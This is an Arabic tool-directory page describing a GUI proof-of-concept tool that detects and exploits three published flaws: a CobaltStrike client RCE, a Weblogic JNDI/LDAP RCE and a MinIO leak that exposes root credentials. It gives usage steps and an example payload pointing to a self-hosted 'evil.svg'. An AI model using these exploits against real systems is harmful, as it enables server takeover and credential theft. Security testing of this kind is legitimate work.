Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Gui-poc-test — أداة اختبار لـ CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 | Kitploit
أدوات/GitHubGitHub/romanc9/gui-poc-test
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقتطوير الحمولات
GitHubromanc9/gui-poc-test

Gui-poc-test

أداة اختبار لـ CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

عرض المستودع
2منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Gui-poc-test

أداة اختبار لثغرات CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

أداة كشف واستغلال رسومية لهذه الثغرات الثلاث

ملاحظات

  1. يتطلب تشغيل jar الإصدار Java 8

  2. موجهة لهدف واحد، غير مناسبة لفحص ثغرات متعددة العناوين IP

  3. عند التجميع، يتطلب استغلال ثغرة Weblogic引用 wlfullclient.jar، يجب إضافته يدويًا

الاستخدام

java -jar Gui-poc-test.jar

طريقة الاستخدام: يوجد زرين للكشف والاستغلال، مع تلميحات في واجهة الأداة حسب الثغرة

تسريب معلومات MinIO:

أدخل الهدف، لا حاجة لإدخال المنفذ، المنفذ الافتراضي 9000، يمكن تغييره، راجع الكود المصدري GuiDemo.java:line144

يعرض MINIO_ROOT_USER و MINIO_ROOT_PASSWORD إلخ

image

Weblogic RCE

أدخل IP الهدف، المنفذ، وعنوان خادم LDAP

الكشف:

image

ملاحظة: يتطلب استغلال الثغرة إعداد خادم ldap بنفسك (عبر الإنترنت العام)

  • أداة استغلال خادم jndi: استخدم أداة JNDIExploit.jar لتشغيل خدمة LDAP و WEB، راجع https://github.com/WhiteHSBG/JNDIExploit
image

CobaltStrike RCE

  1. بعد اختيار الثغرة، يتم عرض طريقة الفحص الذاتي بشكل افتراضي؛ أدخل كود الكشف في مستمع cs لاختبار وجود الثغرة
  2. شرط استغلال الثغرة: الحصول محليًا على حصان طروادة للهدف (exe)
  3. متطلبات بيئة التشغيل: ويندوز، python3، تثبيت frida-tools عبر pip3
  4. تم إضافة python إلى متغيرات البيئة
  5. قم بإعداد خادم بنفسك لوضع ملف svg، ملف jar، بحيث يمكن للهدف الوصول إليه
  6. أدخل المسار المطلق لـ exe وعنوان svg، مفصولين بمسافة، وانقر على تنفيذ لتحقيق الإجراء المضاد
  7. محتوى ملف jar يمكن ضبطه بنفسك، المحتوى التوضيحي هو فتح الآلة الحاسبة
  8. اسم الحصان الافتراضي هو beacon، يمكن تعديله، راجع الكود المصدري cve_2022_39197.py:line28

مثال للـ payload: beacon.exe http://127.0.0.1:4444/evil.svg

النتيجة: تشغيل الحصان على ويندوز، اتصال عميل cs على mac بالخادم

في نفس الوقت، ينفذ عميل cs محتوى jar، ويتم فتح الآلة الحاسبة

image

تسجيل عنوان وصول cs على ويندوز

image

المرجع

المبدأ: https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md

https://github.com/4ra1n/CVE-2023-21839

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

https://github.com/its-arun/CVE-2022-39197

تصحيح cs: https://github.com/burpheart/CVE-2022-39197-patch

تنزيل الأداة